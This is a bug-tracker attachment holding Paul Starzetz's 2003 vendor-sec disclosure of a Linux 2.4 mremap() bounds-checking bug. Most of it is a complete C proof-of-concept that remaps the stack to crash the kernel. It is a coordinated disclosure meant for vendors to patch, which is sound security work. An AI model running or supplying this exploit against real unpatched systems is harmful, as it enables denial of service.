Attachment 15547 Details for Bug 48728

Original bug report by Paul Starzetz

mremap1 (text/plain), 3.54 KB, created by Olaf Kirch on 2003-12-18 18:43:55 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Olaf Kirch

Created: 2003-12-18 18:43:55 UTC

Size: 3.54 KB

patch

obsolete

>From: Paul Starzetz <ihaquer@isec.pl>
>To: vendor-sec <vendor-sec@lst.de>
>Subject: [vendor-sec] Another Linux MM bug
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Hi,
>
>there is another mbug in the Linux memory management subsystem up to and
>including the 2.4.23 version.
>
>We believe that the bug is exploitable however we didn't find a simple
>exploitation method on the i386 architecture. This may not hold for 
>architectures supporting the MAP_GROWSUP vma flag (ia64 so far).
>
>Attached a replacement for your favourite setuid /sbin/reboot
>command.
>
>regards
>
>- --
>Paul Starzetz
>iSEC Security Research
>http://isec.pl/
>
>
>/*
>*
>*
>*	mremap() bound checking bug
>*	proof of concept by P.Starzetz
>*
>*/
>
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <errno.h>
>#include <string.h>
>#include <unistd.h>
>#include <fcntl.h>
>#include <syscall.h>
>#include <signal.h>
>
>#include <sys/mman.h>
>
>#include <asm/page.h>
>
>
>
>#define TASK_SIZE	0xc0000000
>#define STACK_ADDR	0xbfffb000
>#define STACK_SIZE	(TASK_SIZE-STACK_ADDR)
>#define PAGE_ALIGN(addr)	(((addr)+PAGE_SIZE-1)&PAGE_MASK)
>
>#define MREMAP_MAYMOVE	1
>#define MREMAP_FIXED	2
>
>
>#define __NR_sys_mremap           163
>_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, ulong,
>	  e);
>unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
>			 unsigned long new_len, unsigned long flags,
>			 unsigned long new_addr);
>
>extern char **environ;
>
>
>void fatal(const char *msg)
>{
>    printf("\n");
>    if (!errno) {
>	fprintf(stderr, "FATAL: %s\n", msg);
>    } else {
>	perror(msg);
>    }
>
>    printf("\n");
>    fflush(stdout);
>    fflush(stderr);
>    exit(1);
>}
>
>
>void do_segv(int v)
>{
>    printf("\nsegv caught, sleeping");
>    fflush(stdout);
>    while (1)
>	sleep(1);
>}
>
>
>void printmaps()
>{
>    static char buf[8192];
>    int fd;
>
>    memset(buf, 0, sizeof(buf));
>    fd = open("/proc/self/maps", O_RDONLY);
>    read(fd, buf, sizeof(buf) - 1);
>    close(fd);
>    printf("\n%s\n", buf);
>    fflush(stdout);
>}
>
>
>void do_crash()
>{
>    void *p;
>    ulong r;
>    int pid;
>
>    p = mmap((void *) STACK_ADDR, STACK_SIZE - PAGE_SIZE,
>	     PROT_EXEC | PROT_WRITE | PROT_READ,
>	     MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED | MAP_GROWSDOWN, 0,
>	     0);
>    if (p == MAP_FAILED)
>	fatal("mmap");
>    printf("\nmmaped new area at %p", p);
>    fflush(stdout);
>    signal(SIGSEGV, &do_segv);
>    r = sys_mremap((ulong) p, 0, 0, MREMAP_FIXED | MREMAP_MAYMOVE,
>		   TASK_SIZE);
>
>    if (r == (-1))
>	fatal("mremap");
>    printf("\nremapped 0x%.8lx\n", r);
>    fflush(stdout);
>    printmaps();
>    pid = fork();
>    if (pid) {
>	sleep(1);
>	printf("\nCrAsHiNg now\n");
>	fflush(stdout);
>	kill(pid, SIGKILL);
>	kill(getpid(), SIGKILL);
>	exit(0);
>    } else
>	while (1)
>	    usleep(1);
>}
>
>
>void do_unmapstack()
>{
>    int r;
>
>    r = munmap((void *) STACK_ADDR, STACK_SIZE);
>    if (r)
>	fatal("munmap");
>    printf("\nunmapped old stack");
>    fflush(stdout);
>    do_crash();
>
>    printf("\nenter");
>    fflush(stdout);
>    getchar();
>
>    exit(0);
>}
>
>
>void do_mapstack()
>{
>    void *p;
>    unsigned stack;
>
>
>    p = mmap(NULL, STACK_SIZE, PROT_EXEC | PROT_WRITE | PROT_READ,
>	     MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
>    if (p == MAP_FAILED)
>	fatal("mmap");
>    printf("\nmmaped new stack at %p", p);
>    fflush(stdout);
>    stack = ((unsigned) p) + STACK_SIZE - 4;
>  __asm__("movl %0, %%esp": :"m"(stack));
>    environ = NULL;
>    do_unmapstack();
>}
>
>
>int main()
>{
>
>    do_mapstack();
>
>    return 0;
>}
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.7 (GNU/Linux)
>
>iD8DBQE/1HkPC+8U3Z5wpu4RAueMAKDjAH5/OKTcO+xE+ja3ajFvbdYdVwCgyJzo
>lPtionUvPilzoPhmSLCYOZA=
>=HMqo
>-----END PGP SIGNATURE-----

Actions: View

Attachments on bug 48728: 15547 | 15548 | 16073